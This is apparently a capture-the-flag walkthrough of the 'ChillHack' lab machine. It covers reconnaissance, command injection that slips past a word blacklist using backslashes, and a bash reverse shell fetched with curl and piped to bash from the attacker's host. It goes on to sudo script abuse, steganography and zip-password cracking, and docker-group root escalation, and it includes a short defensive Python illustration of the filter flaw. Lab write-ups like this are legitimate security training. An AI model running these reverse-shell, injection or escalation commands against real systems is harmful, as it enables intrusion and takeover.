ChillHack

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn):

nmap -Pn 10.10.161.202

Detailed Nmap scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 21,22,80

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 21,22,80 -oN nmap 10.10.161.202

Enumeration

Port 21: FTP

We see in the nmap scan that anonymous FTP login is allowed, so let's log in:

ftp 10.10.161.202

Listing the files, we see a note.txt file, so let's transfer it to our machine:

get note.txt

Let's read note.txt.

We have two usernames, Anurodh and Apaar; let's add them to our notes.

We also see that there is some filtering on strings passed to the command, which we might encounter while enumerating this machine further.

Port 80: HTTP

Let's visit the site.

Looks like a well-made website; let's run gobuster to find hidden directories while we explore the webpage:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.161.202

I looked through the website and found nothing interesting in the source code either; after a while I got the results of the gobuster scan.

Let's visit this /secret directory.

Looks like we can execute commands; let's try a basic command. When I tried executing ls it gave me this.

Now looking back at note.txt, it mentioned that there was filtering on the commands. To bypass that, I remembered there was a way to get around filtering: using backslashes in the command. A backslash before an ordinary character escapes nothing, so bash simply removes it and interprets the word exactly as before, while the filter's string comparison no longer matches. Let's try l\s.

And it worked, so now let's check the index.php page, which will tell us what characters and words are being filtered:

c\at index.php

After executing the command, look at the source code.

We have a list of blacklisted words, which means we cannot use them in our commands; we can also see the function that allows command injection. Let's now try to get a reverse shell on the machine.
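As an added illustration (this is not the page's index.php and BLACKLIST/ALLOWED are constructed, not the machine's real lists), the following Python models the word-blacklist check the writeup describes, shows why comparing the raw string misses the backslash form that bash normalises away, and contrasts it with an allowlist that never hands user text to a shell at all.

```python
import shlex
from typing import Optional

# Constructed word list standing in for the filter found in index.php;
# it is not the machine's real list.
BLACKLIST = {"ls", "cat", "bash", "nc", "curl", "python"}

def blacklist_allows(raw_cmd: str) -> bool:
    """Naive filter: compare the raw, whitespace-split words against the list.
    This is the weak pattern: it inspects the text before the shell does any
    quote removal, so 'l\\s' is not 'ls' to the filter but is to bash."""
    return not any(word in BLACKLIST for word in raw_cmd.split())

def shell_view(raw_cmd: str) -> list[str]:
    """The argv a POSIX shell derives from the string after quote removal
    (a backslash before an ordinary character is simply dropped)."""
    return shlex.split(raw_cmd)

def blacklist_allows_normalized(raw_cmd: str) -> bool:
    """Same blacklist, but applied to the shell's view of the command. This
    closes the backslash gap; it is still a blacklist, so any command name
    not on the list remains reachable, which is why it is not the real fix."""
    try:
        argv = shell_view(raw_cmd)
    except ValueError:          # unbalanced quotes: reject rather than guess
        return False
    return not any(word in BLACKLIST for word in argv)

# Hardened pattern: map a small set of fixed names to fixed argv and run them
# without a shell (subprocess.run(argv), never shell=True). Constructed table.
ALLOWED = {
    "uptime": ["uptime"],
    "whoami": ["whoami"],
    "disk":   ["df", "-h"],
}

def allowlist_resolve(raw_cmd: str) -> Optional[list[str]]:
    """Return the fixed argv for a known name, or None for anything else.
    User text is used only as a dictionary key and never reaches a shell."""
    return ALLOWED.get(raw_cmd.strip())

if __name__ == "__main__":
    for cmd in ("ls", "l\\s", "c\\at index.php", "whoami"):
        print(f"{cmd!r:18} blacklist={blacklist_allows(cmd)} "
              f"normalized={blacklist_allows_normalized(cmd)} "
              f"allowlist={allowlist_resolve(cmd)}")
```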

Exploitation

  • First we create a bash reverse shell.

  • Second we transfer it to the victim machine by starting an HTTP server on our machine and using the curl command.

  • Finally, once the file is downloaded, we start a netcat listener and execute the transferred file to get a reverse shell on the machine.

First we create a bash reverse shell called shell.sh:

bash -c "bash -i >& /dev/tcp/<your-ip>/1234 0>&1"

Now we start an HTTP server:

python3 -m http.server 8000

Let's also start a netcat listener:

nc -lvnp 1234

Now we download the file onto the victim machine using curl and execute it with bash in the same command. We use a backslash in bash because that word has been blacklisted:

curl <your-ip>:8000/shell.sh | ba\sh

After executing the command, we get a reverse shell.

Let's now stabilize the shell:

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + C

Privilege Escalation

Looking at the files on the system, we did not have permission to read most of them, so let's run an automatic enumeration script called linpeas. You can find it with a quick Google search; once you have downloaded it, we need to transfer it to this machine.

We already have an HTTP server running; if you switched it off, start it up again.

Now we have to go to the /tmp directory, as we are not allowed to write files into other directories and /tmp usually allows us to download files into it:

wget http://<your-ip>:8000/linpeas.sh

Before this, let's run sudo -l to see what we can run as other users.

Looks like we can run a script file; let's read it.

Looking at the script, it looks vulnerable to command injection as there are no filters. The file is owned by Apaar, so we can try running it, execute a bash shell, and get a bash instance as the user Apaar.

Let's first run the file, then type /bin/bash to get a shell as Apaar, and then stabilize the shell:

sudo -u apaar /home/apaar/.helpline.sh
/bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'

We are now the user Apaar and can read the user flag in Apaar's home directory.

Now I tried running linpeas but it did not work, so I had to find another way to escalate privileges, and that is when I found some interesting files in /var/www/files.

Let's read these files.

hacker.php

This looks like it displays an image file, and there is a message hinting that something might be hidden in the image. Let's download this file, but first let's explore the other files.

account.php

This looks like a login page.

index.php

In this file we see the credentials for the SQL database running on this machine.

Let's now download the image file we found in hacker.php. First, go to the directory in which the file is present.

Let's start an HTTP server on this machine:

python3 -m http.server 8000

Now let's download the file onto our machine:

wget http://10.10.161.202:8000/hacker-with-laptop_23-2147985341.jpg

Now let's look at the file.

Let's use steghide to look for hidden information in the file (press Enter for an empty password):

steghide info hacker-with-laptop_23-2147985341.jpg

We see a zip file; let's extract it using steghide:

steghide --extract -sf hacker-with-laptop_23-2147985341.jpg

Let's unzip the zip file we got:

unzip backup.zip

Looks like we need a password. We can use zip2john and then John the Ripper to find it:

zip2john backup.zip > hash

Now use john to crack the password:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Now show the password:

john hash --show

We have the password. Let's unzip the file:

unzip backup.zip

Let's read the source_code.php file.

Looking through it, we find a base64 string that is the password for the user Anurodh. Let's decode it:

echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d

We have the password; let's now log in through SSH:

ssh anurodh@10.10.161.202

We are now logged in. I was looking around and did not see anything of interest until I ran the command id:

id

Anurodh is part of the docker group. We can find the command to become root on GTFOBins.

Let's run this command:

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

We are now root.